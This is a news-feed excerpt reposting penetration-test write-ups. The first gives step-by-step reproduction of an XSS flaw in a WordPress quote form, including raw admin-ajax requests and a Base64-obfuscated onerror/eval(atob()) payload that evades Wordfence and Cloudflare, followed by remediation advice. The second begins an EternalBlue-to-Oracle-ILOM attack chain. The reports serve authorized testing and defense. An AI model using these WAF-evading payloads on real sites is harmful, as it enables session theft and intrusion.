<li>Target: Public “Get a Quote” form (AJAX backend: <code>admin-ajax.php</code>)</li>
<li>Vulnerable Parameters: <code>country</code>, <code>action</code></li>
<li>Successful Payload: Obfuscated Base64 JavaScript within <code>&lt;img onerror=eval(atob(...))&gt;</code> or CSS-based <code>url()</code></li>
<li>Defense Bypassed: Wordfence (403 block on standard payloads only), Cloudflare (no alert or mitigation on obfuscated payloads)</li>
<li>Execution Point: Response body of AJAX call rendered client-side by UI component</li>
<li>Impact: Full execution of arbitrary JS in browser, exploitable for session theft, impersonation, or further lateral movement</li>
</ul>
<blockquote>
<p><strong>Blue Team Final Takeaway:</strong> Manual testing exposed a significant gap in layered defenses. WAFs alone are not reliable barriers. Input validation, output encoding, CSP headers, and developer awareness are all essential components in preventing XSS — especially in new or rapidly developed features.</p>
</blockquote></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_72 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: <a href="https://www.blackhatethicalhacking.com/articles/post-exploitation-techniques-maintaining-access-escalating-privileges-gathering-credentials-covering-tracks/">Post-Exploitation Techniques: Maintaining Access, Escalating Privileges, Gathering Credentials, Covering Tracks</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_73  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="post_title"><strong>Steps to Reproduce</strong></h2>
<p>The following steps outline how to reproduce the XSS vulnerability using Burp Suite and a web browser. All sensitive details (e.g., domain names, cookies) have been redacted or replaced with placeholders for security. Only authorized testers should attempt this on a staging environment.</p>
<ol>
<li><strong>Navigate to the “Get a Quote” form page.</strong><br>Open the target website’s Get a Quote page (e.g., <code>https://[ClientSite]/get-quote/</code>) in a browser. Prepare Burp Suite and configure your browser to use it as a proxy for intercepting requests.</li>
<li><strong>Submit the form with interception enabled.</strong><br>Fill in the form fields with test data. For the quote request to proceed, valid-looking values may be needed (e.g., a sample name, email, etc.). If the form dynamically loads data (for example, selecting a country triggers an AJAX request to load zip codes), ensure those actions are performed while interception is on.</li>
<li><strong>Identify the vulnerable request.</strong><br>In Burp’s <strong>Proxy &gt; HTTP history</strong>, find the request associated with the form submission or dynamic loading. The vulnerable endpoint is an AJAX call to <code>/wp-admin/admin-ajax.php</code> with a parameter such as <code>action=get_zipcodes</code>.
<pre><code>POST /wp-admin/admin-ajax.php HTTP/2
Host: [ClientSite]
Content-Type: application/x-www-form-urlencoded

country=US&amp;action=get_zipcodes
    </code></pre>
<p>In this case, the <code>country</code> field is user-controllable. The server’s response is an HTML snippet (e.g., a list of &lt;option&gt; tags for zip codes), which makes it suitable for injection.</p>
</li>
<li><strong>Attempt a simple XSS payload (for baseline).</strong><br>Send the request to Burp Repeater and modify the <code>country</code> value to a basic XSS string, for example:
<pre><code>country="&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;&amp;action=get_zipcodes</code></pre>
<p>Then send the request.<strong>Expected result:</strong> The response is blocked by the server. Wordfence should return a <code>403 Forbidden</code> and display a security warning. This confirms that the WAF is functioning as expected for obvious payloads.</p>
</li>
<li><strong>Craft an obfuscated payload to evade the WAF.</strong><br>Next, encode or obfuscate the payload. One proven method is to use a Base64-encoded JavaScript string decoded by <code>atob()</code>:
<pre><code>&lt;img src="x" onerror="eval(atob('YWxlcnQoJ1hTUycp'))"&gt;</code></pre>
<p>When URL-encoded for transport, the payload becomes:</p>
<pre><code>country=%3Cimg%20src%3Dx%20onerror%3D%22eval(atob('YWxlcnQoJ1hTUycp'))%22%3E&amp;action=get_zipcodes</code></pre>
<p>This hides the actual <code>alert('XSS')</code> within the Base64 string <code>YWxlcnQoJ1hTUycp</code>. The browser decodes and executes it, but to Wordfence/Cloudflare it does not resemble typical <code>&lt;script&gt;</code> or <code>alert</code> keywords.</p>
</li>
<li><strong>Send the obfuscated payload.</strong><br>Using Burp Repeater (or Intruder for automation), send the modified request with the encoded payload.<strong>Expected result:</strong> The response should return <code>HTTP 200 OK</code> and include normal form content (e.g., <code>&lt;option&gt;Select zipcode&lt;/option&gt;</code>). No WAF error or block page should be present. In a real browser, this AJAX response will be rendered, and the malicious tag will execute silently, triggering the JavaScript.
<p><em>Note:</em> For validation, copy the raw HTML response into a test page or use Burp’s embedded browser to observe execution.</p>
</li>
<li><strong>Verify XSS execution in browser.</strong><br>In a safe environment, simulate the front-end’s behavior after the payload is sent. If the form relies on client-side rendering of the dropdown, ensure the injected content appears and triggers.<strong>Expected behavior:</strong> The browser will process the payload, and a JavaScript alert should pop up (or any benign visible output confirming execution).
</li>
<li><strong>Redact and document evidence.</strong><br>Capture screenshots of:
<ul>
<li>The Burp request/response showing successful delivery</li>
<li>Browser output showing the script execution</li>
</ul>
<p>Ensure all sensitive information — such as cookies, IPs, or hostnames — is redacted before including them in any report.</p>
</li>
</ol>
<p>By following these steps, the XSS vulnerability can be reliably reproduced, confirming that the “Get a Quote” form’s backend logic is susceptible to obfuscated input that bypasses existing WAF mechanisms. This also demonstrates the impact of allowing user-supplied content to be reflected unfiltered into the DOM.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_74  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="post_title"><strong>Remediation</strong></h2>
<p>To fix this vulnerability and prevent similar issues, the development and security teams should implement multiple layers of defense. Key remediation actions are detailed below:</p>
<ul>
<li><strong>Input Validation &amp; Sanitization:</strong><br>Implement strict server-side validation for all input fields in the “Get a Quote” form (and across the site). The <code>country</code> parameter should only accept expected formats (e.g., country names or ISO codes). Enforce allow-lists and reject any input that deviates. For output in templates, use WordPress escaping functions such as <code>esc_html()</code>, <code>esc_attr()</code>, or <code>wp_kses()</code> to neutralize any injected script content.</li>
<li><strong>Output Encoding:</strong><br>Ensure all server responses, especially those returned via AJAX, are properly encoded according to context. If HTML is being returned, encode any dynamic values before insertion. As a safer alternative, consider switching to JSON-based responses and rendering elements with client-side JavaScript to reduce the risk of injection.</li>
<li><strong>WAF Rule Updates:</strong><br>Harden Wordfence and Cloudflare configurations. Enable Cloudflare’s Managed Rules for XSS with heightened sensitivity. Create custom WAF rules to detect evasion methods (e.g., <code>javascript:</code> in CSS or <code>atob()</code> in event handlers). Ensure Wordfence is fully updated and that any custom bypass rules are accounted for. Consider blocking common vectors like <code>&lt;img onerror&gt;</code> when not required.</li>
<li><strong>Content Security Policy (CSP):</strong><br>Deploy a strict CSP to prevent inline scripts, <code>eval()</code>, and <code>javascript:</code> URIs from executing. For example, use headers like:
<pre><code>Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none';</code></pre>
<p>This reduces the risk of successful exploitation even if injection occurs, by instructing the browser to ignore or block script execution.</p>
</li>
<li><strong>Server-Side Framework Protections:</strong><br>If the “Get a Quote” form is part of a plugin or theme, verify the component is up to date. If it’s custom-developed, audit the code for improper rendering of user input. Use WordPress best practices (e.g., <code>wp_verify_nonce()</code>) to enforce request origin and prevent CSRF. Avoid rendering any user input directly into markup unless it’s properly sanitized.</li>
</ul>
<p>By implementing these remediation steps, the vulnerability can be fully mitigated and the application hardened against future XSS attacks. The objective is to treat all user input as untrusted and to apply defense-in-depth principles — ensuring that if one layer (e.g., WAF) fails, others (application logic, browser policies, framework-level protections) provide sufficient safeguards.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_75 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: <a href="https://www.blackhatethicalhacking.com/articles/the-difference-between-internal-and-external-pentesting/">The Difference between Internal and External Pentesting</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_76  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="post_title"><strong>Lessons for the Defense Team</strong></h2>
<p>This incident provides several important lessons and takeaways for the defensive team:</p>
<ul>
<li><strong>Don’t Rely Solely on WAFs:</strong><br>Web Application Firewalls like Wordfence and Cloudflare are helpful, but they are not foolproof. Skilled attackers can craft inputs that evade signature-based detection. It’s crucial to build security into the application itself (via secure coding practices), rather than assuming external tools will catch all malicious input.</li>
<li><strong>Security Testing for New Features:</strong><br>Any new feature — such as the “Get a Quote” form — should undergo a rigorous security assessment before and after deployment. In this case, the feature was introduced without prior penetration testing, which allowed a critical bug to reach production. Going forward, ensure all new code is reviewed for common vulnerabilities (e.g., XSS, SQLi), and integrate automated scans or dedicated security QA checks into the deployment pipeline.</li>
<li><strong>Regular Updates and Monitoring:</strong><br>Keep all security tools and components up to date. For example, Wordfence has had public bypasses (e.g., <a href="https://sikasecurity.com/cve-2019-9669-wordfence-waf-bypass/" target="_blank" rel="noopener noreferrer">CVE-2019-9669</a>), highlighting the need for ongoing patching and rule refinement. Monitor WAF logs proactively — a pattern of blocked requests followed by a successful similar request may signal a bypass attempt. Timely log reviews can help catch exploitation early.</li>
<li><strong>Defense in Depth:</strong><br>Use multiple, overlapping layers of security. If one layer fails, others should still protect the application. For XSS, this means combining input validation, output encoding, CSP headers, and behavioral monitoring. In this case, even though the WAF missed the attack, proper output escaping would have neutralized the exploit. Similarly, a strict Content Security Policy would have prevented script execution, even if injection succeeded.</li>
<li><strong>Blue Team and Red Team Collaboration:</strong><br>This outcome illustrates the importance of thinking like an attacker. Regularly perform adversarial simulations — either via internal red teams or external engagements — particularly for high-impact application functionality. The blue team can use findings from these tests to tune existing defenses (e.g., refining Wordfence or Cloudflare rule sets). Include training on modern obfuscation and bypass techniques so defenders recognize advanced attack signatures.</li>
<li><strong>Incident Response Preparedness:</strong><br>Although this was a simulated attack, a real adversary exploiting the same vector could have caused damage before detection. Ensure that your incident response plan includes coverage for web injection attacks. Implement monitoring for unusual admin actions, page or plugin changes, and session anomalies. Be prepared to revoke tokens or invalidate sessions quickly if a privileged user account is suspected of being compromised.</li>
</ul>
<p>By learning from these lessons, the defense team can significantly improve the organization’s security posture. The goal is to minimize attackers’ windows of opportunity by catching vulnerabilities early, responding quickly, and layering defenses to mitigate both basic and advanced threats. The discovery in the “Get a Quote” feature should serve as a catalyst for tighter security practices across the board.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_77 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: <a href="https://www.blackhatethicalhacking.com/articles/maximizing-idor-detection-with-burp-suites-autorize/">Write up: Maximizing IDOR Detection with Burp Suite’s Autorize</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_78  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p> </p>
<blockquote>
<p>We hope that this write up has taught you something new. If you enjoyed it, the best way that you can support us is to share it! If you’d like to hear more about us, you can find us on <a href="https://www.linkedin.com/company/black-hat-ethical-hacking">LinkedIn</a>, <a href="https://twitter.com/secur1ty1samyth">Twitter</a>, <a href="https://www.youtube.com/channel/UC7-AsunT7zO-ny5-U8glqkw">YouTube</a>.</p>
</blockquote></div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_10 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_text et_pb_text_79  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><blockquote>
<p><strong>Disclaimer:</strong> All actions described in this report were performed under strict ethical guidelines and with explicit written authorization from the client. Black Hat Ethical Hacking does not condone or take any responsibility for the misuse of the information contained herein. This write-up is intended solely for educational and professional reporting purposes. No details revealing the identity of the client, their infrastructure, or specific assets have been disclosed, ensuring full confidentiality and protection of client data.</p>
</blockquote></div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_26 patreon-row">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_26 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_80 premium-content  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h3 class="premium-content">You can find it from our <a href="https://www.patreon.com/blackhatethicalhacking/shop">shop</a> on our Patreon Channel:</h3></div>
			</div><div class="et_pb_module et_pb_image et_pb_image_4">
				
				
				
				
				<a href="https://www.patreon.com/blackhatethicalhacking/shop/hacking-with-armitage-metasploit-100631" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="800" height="120" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/02/Hacking-with-Armitage.png" alt="Patreon" title="Hacking with Armitage" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/02/Hacking-with-Armitage.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2024/02/Hacking-with-Armitage-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw" class="wp-image-277902"></span></a>
			</div>
			</div>
				
				
				
				
			</div>
			</div><div class="et_pb_column et_pb_column_1_4 et_pb_column_11    et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_module et_pb_sidebar_10 news-sidebar1 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget rpwe_widget recent-posts-extended"><h4 class="widgettitle">Recent Articles</h4><div class="rpwe-block news-recent-posts-sb"><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/articles/critical-fortigate-100f-ssl-vpn-vulnerability-exploited/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/60-300x150.png" alt="Critical FortiGate 100F SSL-VPN Vulnerability Exploited" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/articles/critical-fortigate-100f-ssl-vpn-vulnerability-exploited/" target="_self">Critical FortiGate 100F SSL-VPN Vulnerability Exploited</a></h3><time class="rpwe-time published" datetime="2025-06-24T19:25:09+02:00">June 24, 2025</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/articles/unauthorized-ldap-enumeration-exposes-active-directory-for-privilege-escalation/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Copy-of-Images-for-the-Website-posts-300x150.png" alt="Unauthorized LDAP Enumeration Exposes Active Directory for Privilege Escalation" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/articles/unauthorized-ldap-enumeration-exposes-active-directory-for-privilege-escalation/" target="_self">Unauthorized LDAP Enumeration Exposes Active Directory for Privilege Escalation</a></h3><time class="rpwe-time published" datetime="2025-06-23T16:44:35+02:00">June 23, 2025</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/articles/using-favicon-for-osint/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Using-Favicon-for-OSINT-300x150.webp" alt="Using Favicon for OSINT" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/articles/using-favicon-for-osint/" target="_self">Using Favicon for OSINT</a></h3><time class="rpwe-time published" datetime="2025-06-19T15:10:45+02:00">June 19, 2025</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/articles/red-team-vs-blue-team-mindset-for-better-cybersecurity-defense/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Red-Team-vs-Blue-Team-Mindset-300x150.png" alt="Red Team vs Blue Team Mindset for Better Cybersecurity Defense" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/articles/red-team-vs-blue-team-mindset-for-better-cybersecurity-defense/" target="_self">Red Team vs Blue Team Mindset for Better Cybersecurity Defense</a></h3><time class="rpwe-time published" datetime="2025-06-18T08:44:16+02:00">June 18, 2025</time></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div><div class="widget_text et_pb_widget widget_custom_html"><div class="textwidget custom-html-widget">
<!-- Articles Adsense Adcode -->
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="3193330934" data-ad-format="auto" data-full-width-responsive="true"></ins>
</div></div>
			</div><div class="et_pb_module et_pb_sidebar_11 news-sidebar2 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget widget_block"><a href="https://www.blackhatethicalhacking.com/courses/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png"></a>
<h3>Offensive Security &amp; Ethical Hacking Course</h3>
<p>Begin the learning curve of hacking now!</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Solutions.png"></a>
<h3>Information Security Solutions</h3>
<p>Find out how Pentesting Services can help you.</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://discord.gg/EYMqveWXkv"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/10/Discord.png"></a>
<h3>Join our Community</h3></div>
			</div>
			</div>
				</div>
				
			</div>The post <a href="https://www.blackhatethicalhacking.com/articles/cross-site-scripting-vulnerability-in-get-a-quote-feature-while-bypassing-wordfence-and-cloudflare/">XSS Vulnerability in “Get a Quote” while bypassing WordFence and CloudFlare</a> first appeared on <a href="https://www.blackhatethicalhacking.com/">Black Hat Ethical Hacking</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Post-Exploitation of Oracle ILOM Server via Eternal Blue]]></title>
<description><![CDATA[Post-Exploitation of Oracle ILOM Server via Eternal Blue
				
				
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				
				 Post Views: 18
			
			
				
				
				
				
				   
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
			...]]></description>
<link>https://tsecurity.de/de/2848637/it-security-nachrichten/post-exploitation-of-oracle-ilom-server-via-eternal-blue/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2848637/it-security-nachrichten/post-exploitation-of-oracle-ilom-server-via-eternal-blue/</guid>
<pubDate>Tue, 24 Jun 2025 14:03:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="et_pb_section et_pb_section_5 et_section_specialty">
				
				
				
				
				
				<div class="et_pb_row">
				<div class="et_pb_column et_pb_column_3_4 et_pb_column_10   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_row_inner et_pb_row_inner_25">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_25 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_post_title et_pb_post_title_5 et_pb_bg_layout_light  et_pb_text_align_left">
				
				
				
				
				
				<div class="et_pb_title_container">
					<h1 class="entry-title">Post-Exploitation of Oracle ILOM Server via Eternal Blue</h1>
				</div>
				
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_26">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_26 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_90  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><div class="post-views content-post post-284763 entry-meta load-static">
				<span class="post-views-icon dashicons dashicons-chart-bar"></span> <span class="post-views-label">Post Views:</span> <span class="post-views-count">18</span>
			</div></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_91  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p> <!-- Articles_Horizontal_smaller --> <ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="4873481366"></ins> </p></div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_27 patreon-row">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_27 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_divider et_pb_divider_9 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_pricing_tables_0 et_pb_pricing clearfix et_pb_pricing_2 et_pb_no_featured_in_first_row">
				
				
				
				
				<div class="et_pb_pricing_table_wrap">
					<div class="et_pb_pricing_table et_pb_pricing_table_0">
				
				
				
				
				<div class="et_pb_pricing_heading">
					<h2 class="et_pb_pricing_title">Signup now - Monthly Subscription</h2>
					<span class="et_pb_best_value">To access all our monthly premium writeups</span>
				</div>
				<div class="et_pb_pricing_content_top">
					<span class="et_pb_et_price"><span class="et_pb_dollar_sign">€</span><span class="et_pb_sum">3</span><span class="et_pb_frequency"><span class="et_pb_frequency_slash">/</span>Monthly</span></span>
				</div>
				<div class="et_pb_pricing_content">
					
				</div>
				<div class="et_pb_button_wrapper"><a class="et_pb_button et_pb_pricing_table_button" href="https://www.blackhatethicalhacking.com/signup-bug-bheh-pentesting-premium-articles-monthly/">Sign me up!</a></div>
			</div><div class="et_pb_pricing_table et_pb_pricing_table_1">
				
				
				
				
				<div class="et_pb_pricing_heading">
					<h2 class="et_pb_pricing_title">Signup now - Yearly Subscription</h2>
					<span class="et_pb_best_value">Get 2 Months for Free!</span>
				</div>
				<div class="et_pb_pricing_content_top">
					<span class="et_pb_et_price"><span class="et_pb_dollar_sign">€</span><span class="et_pb_sum">30</span><span class="et_pb_frequency"><span class="et_pb_frequency_slash">/</span>Yearly</span></span>
				</div>
				<div class="et_pb_pricing_content">
					
				</div>
				<div class="et_pb_button_wrapper"><a class="et_pb_button et_pb_pricing_table_button" href="https://www.blackhatethicalhacking.com/signup-bug-bheh-pentesting-premium-articles-yearly/">Sign me up!</a></div>
			</div>
				</div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_10 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_28">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_28 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_92  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p>Reading Time: 5 Minutes</p></div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_29">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_29 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_93  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="post_title"><strong>Introduction</strong></h2>
<p>While automated tools are useful for maintaining baseline security, they often miss sophisticated, multi-layered vulnerabilities that require a manual, strategic approach to uncover. At Black Hat Ethical Hacking (BHEH), our Red Team employs advanced manual testing, real-world attack simulations, and in-depth system analysis to uncover vulnerabilities that automated methods often overlook. This process highlights the importance of human expertise and creativity in identifying and exploiting complex weaknesses that could compromise even well-protected systems.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_94  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"> <!-- Articles_Horizontal_smaller --> <ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="4873481366"></ins> </div>
			</div><div class="et_pb_module et_pb_text et_pb_text_95 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: So you want to be a hacker?<br><a href="https://www.blackhatethicalhacking.com/courses/offensive-security-and-ethical-hacking-course/">Offensive Security and Ethical Hacking Course</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_96  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="post_title"><strong>Executive Summary</strong></h2>
<p>During a penetration testing engagement, our team identified a critical exploitation chain affecting an enterprise network. The attack began by exploiting the EternalBlue vulnerability (CVE-2017-0144) on an unpatched Windows server, allowing remote code execution. We used this foothold to pivot within the internal network and discovered an Oracle ILOM server still configured with factory-default credentials.</p>
<p>Exploiting these misconfigurations granted us full administrative access to the ILOM interface, exposing SSH private keys, remote hardware control (via KVMS), and the ability to cause significant operational disruption. This case shows how the combination of unpatched legacy systems and default credentials can open the door to serious breaches, especially when those systems manage core infrastructure.</p>
<p><em>Security Lesson Learned: Oracle ILOM devices must never retain factory-default credentials in production environments.</em></p>
<p>The following report details each stage of the attack, the associated risks, and concrete remediation strategies.</p>
<p> </p>
<h2 class="post_title"><strong>Overview of the Issue Discovered</strong></h2>
<h3><span><strong>Weakness Type</strong></span></h3>
<ul>
<li><strong>Vulnerability Chain</strong>: EternalBlue Exploitation and Oracle ILOM Default Credentials</li>
<li><strong>CVE References</strong>: <strong>CVE-2017-0144</strong>: EternalBlue SMB vulnerability in Windows systems</li>
</ul>
<h3><span><strong>Severity</strong></span></h3>
<p><strong>Critical</strong>: This chain of vulnerabilities enabled us to achieve unrestricted administrative access to critical infrastructure components. The exploitation of legacy system vulnerabilities combined with poor credential management presents a severe risk to system integrity, data security, and operational continuity.</p>
<p><strong>Base Score: <span>9.8 (Critical)</span></strong></p>
<p>The CVSS score for EternalBlue (CVE-2017-0144) may change over time based on the availability of exploit tools or security patches. For example, if a patch is universally applied, the score could decrease due to reduced exploitability. Conversely, if new exploit kits make the vulnerability easier to leverage, the Temporal Score could increase. Organizations must regularly reassess CVSS scores as part of their vulnerability management strategy.</p>
<p><strong>Affected Assets</strong></p>
<ul>
<li><strong>IPv6 Address</strong>: [fe70::310:e0ff:fe86:3c4d] (obscured for confidentiality)</li>
<li><strong>Hostname</strong>: oracle-ilom</li>
<li><strong>System Type</strong>: Rack-mounted Oracle SPARC T5-2, a high-performance server model often used for mission-critical applications.</li>
</ul>
<p>This discovery represents a high-severity security flaw due to the unrestricted access it provides to critical management functionalities, with potential for extensive damage across dependent systems.</p>
<p> </p>
<h2><strong>Impact and Risks</strong></h2>
<p>The exploitation of the Oracle ILOM server through the EternalBlue vulnerability and default credentials poses substantial risks that could affect both operational stability and data integrity:</p>
<ul>
<li><strong>Unauthorized Access and Full Control</strong>: By exploiting these vulnerabilities, attackers could obtain administrative privileges, allowing them to alter or disable key system settings, manipulate configurations, and view or erase system logs, making it challenging to trace malicious activity.</li>
</ul>
<p> </p>
<ul>
<li><strong>Sensitive Data Exposure</strong>: The compromised ILOM interface stored unencrypted SSH keys and network data in configuration files. Access to these keys would enable attackers to authenticate on other internal systems, significantly increasing the risk of further compromise.</li>
</ul>
<p> </p>
<ul>
<li><strong>Service Disruption</strong>: ILOM servers manage core components of system infrastructure. An attacker with control over the ILOM could disable or reset services, leading to substantial downtime and operational loss. In environments reliant on 24/7 uptime, this could result in severe financial and reputational damage.</li>
</ul>
<p> </p>
<ul>
<li><strong>Physical and Remote Access</strong>: The ILOM server provides KVMS (Keyboard, Video, Mouse, Storage) control, which allows remote manipulation of hardware-level functionalities. This enables attackers not only to disrupt services but also to modify data at a low level, which can impact data integrity and the reliability of hardware-dependent applications.</li>
</ul>
<p> </p>
<ul>
<li><strong>Pivot Point for Lateral Movement</strong>: The ILOM server, especially in its role as a management interface, offers potential pivot points to other devices in the network. Attackers could leverage this foothold to gain further access, conduct reconnaissance, or execute additional attacks on adjacent systems.</li>
</ul>
<p> </p>
<p>Each of these risks is magnified in an enterprise environment where an ILOM server manages high-value assets, underscoring the importance of securing such devices against unauthorized access and default credential vulnerabilities.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_97  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"> <!-- Articles_Horizontal_smaller --> <ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="4873481366"></ins> </div>
			</div><div class="et_pb_module et_pb_text et_pb_text_98 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: <a href="https://www.blackhatethicalhacking.com/tools/pypykatz/">Offensive Security Tool: Pypykatz</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_99  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="post_title"><strong>Technical Description</strong></h2>
<p>The technical path to this exploitation was neither straightforward nor trivial. It involved a creative combination of network-based exploits and credential reconnaissance that leveraged both a well-known exploit (EternalBlue) and the systemic issue of default credentials left unsecured on legacy systems.</p>
<p>The following flowchart illustrates the sequential stages of the attack, from initial access via EternalBlue to complete administrative control of the Oracle ILOM server.</p>
<p> </p>
